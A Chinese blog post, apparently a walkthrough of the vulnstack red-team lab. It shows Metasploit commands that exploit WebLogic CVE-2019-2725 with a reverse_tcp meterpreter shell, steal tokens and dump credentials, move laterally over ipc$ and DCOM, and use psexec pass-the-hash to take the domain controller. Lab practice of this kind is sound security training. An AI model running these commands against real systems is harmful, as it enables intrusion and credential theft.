ATT&CK实战系列(二)

2023-11-04 14:26:58

vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:漏洞详情

拓扑结构大体如下:
 

环境搭建

Kali

ip:192.168.111.135

Web

Ip1:192.168.111.80

Ip2:10.10.10.80

os:windows 2008

应用:weblogic 10.3.6 mssql 2008

Pc

Ip1:192.168.111.201

Ip2:10.10.10.201

Os:windows7

DC

ip:10.10.10.10

os:windows 2012

应用:AD域

内网:10.10.10.0/24

外网:192.168.111.0/24

从web机开始渗透, 这里需要手动开启服务,在C:

\Oracle\Middleware\user_projects\domains\base_domain\bin 有一个startweblogic的批处理, 然后管理员身份运行

账号/密码:Administrator/1qaz@WSX

外网渗透

  • 先开始nmap扫描一下192.168.111.0/24存活主机

ATT&CK实战系列(二)

然后对80 主机进行信息收集扫描

ATT&CK实战系列(二)

通过445端口开放就存在smb服务可能还会有ms17-010/端口溢出漏洞.

 

开放139端口 就纯真samba服务 于是判断可能会有/远程命令执行漏洞

 

开放1433端口 就存在mssql服务 有可能存在爆破/注入/SA弱口令

 

开放3389 那就是远程桌面喽

 

7001端口 百度了一下得知是 weblogic服务

 

weblogicScan进行扫描漏洞

ATT&CK实战系列(二)

然后百度了一下 CVE-2019-2725漏洞

CVE-2019-2725是一个 weblogic反序列化远程命令执行漏洞,这个漏洞依旧是根据weblogic的xmldecoder(xml解码器)反序列化漏洞

然后通过msf查看一下漏洞利用脚本

ATT&CK实战系列(二)

然后进入开始利用模块

use exploit/multi/misc/weblogic_deserialize_asyncresponseservice 进入CVE-2019-2725攻击漏洞模块

set target windows      这个模块默认是unix 所以我们的目标是windows 所以 改一下即可

Set payload  windows/x64/meterpreter/reverse_tcp 

set LHOST 192.168.111.135

Set rhosts 192.168.111.80  要攻击目标

run

ATT&CK实战系列(二)

 

本来想直接提权,但是发现不能提system权限

system权限

方法1.

ATT&CK实战系列(二)

然后通过显示进程pid 然后用 migrate 进行进程迁移 获得system权限

ATT&CK实战系列(二)

ATT&CK实战系列(二)

方法2.

还可以通过令牌窃取的方式进行提权

load incognito             #加载incognito(伪装)

Getuid                         #查看当前token

list_tokens -u              #列出可用token

 impersonate_token "NT AUTHORITY\\SYSTEM"     #token窃取,格式为impersonate_token"主机名\\用户名"

rev2self                      #返回之前的token

ATT&CK实战系列(二)

然后使用 kiwi 获取 hash 账号密码

ATT&CK实战系列(二)

然后获得了域里的用户和密码 下面使用用户密码进行远程登录

ATT&CK实战系列(二)

开始第二阶段的信息搜集

ATT&CK实战系列(二)

Net  config workstation  #查域信息

得到域信息 还有10.10.10.0/24网段

设置一条通往10.10.10.0/24网段的路由

ATT&CK实战系列(二)

然后设置代理

ATT&CK实战系列(二)

ATT&CK实战系列(二)

使用use post/windows/gather/arp_scanner模块

扫描网段存活主机

ATT&CK实战系列(二)

然后又通过web 进行信息收集了一下

ATT&CK实战系列(二)

ATT&CK实战系列(二)

得知 10.10.10.10 就是域控

域成员 处理web  还有一个PC机

然后判断PC ip是10.10.10.201

下面渗透pc域用户

方法一

首先用kali生成一个payload

ATT&CK实战系列(二)

然后通过web机 上传到 10.10.10.201c盘

先上传到web里

ATT&CK实战系列(二)

 

再控制WEB主机与PC建立一个ipc$连接:

net use \\10.10.10.201\ipc$ "lbb1111.." /user:administrator

然后把刚才上传的文件copy到10.10.10.201 c盘

ATT&CK实战系列(二)

 

然后再meterpreter中载入powershell模块

在powershell里面执行如下命令,控制WEB主机使用DCOM在远程机器PC上执行刚刚上传到PC主机C盘里的木马:

ATT&CK实战系列(二)

 

然后从新开启一个msf 监听生成的 payload 1520 端口

 

ATT&CK实战系列(二)

成功反弹

下面开始提权

ATT&CK实战系列(二)

方法二

代理nmap扫描10.10.10.201

ATT&CK实战系列(二)

使用 exploit/windows/smb/psexec模块进行哈希传递

ATT&CK实战系列(二)

由于一开始再web机得知了域\用户\密码

说以就可以用这个模块直接打了

Set smbdomain  DE1AY  #域

Set smbuser  administrator # 域用户

Set smbpass  lbb1111..     #域用户密码

ATT&CK实战系列(二)

直接system权限

通过扫描得知3389是开哒

然后尝试一下代理远程能不能直接登录

ATT&CK实战系列(二)

  • 向DC 域控发起进攻

同样直接利用msf的exploit/windows/smb/psexec模块进行哈希传递

ATT&CK实战系列(二)

拿下域控制器 并且是system权限

上一篇:ATT&CK-Mitre-Initial Access(初始化访问)


下一篇:朴素贝叶斯原理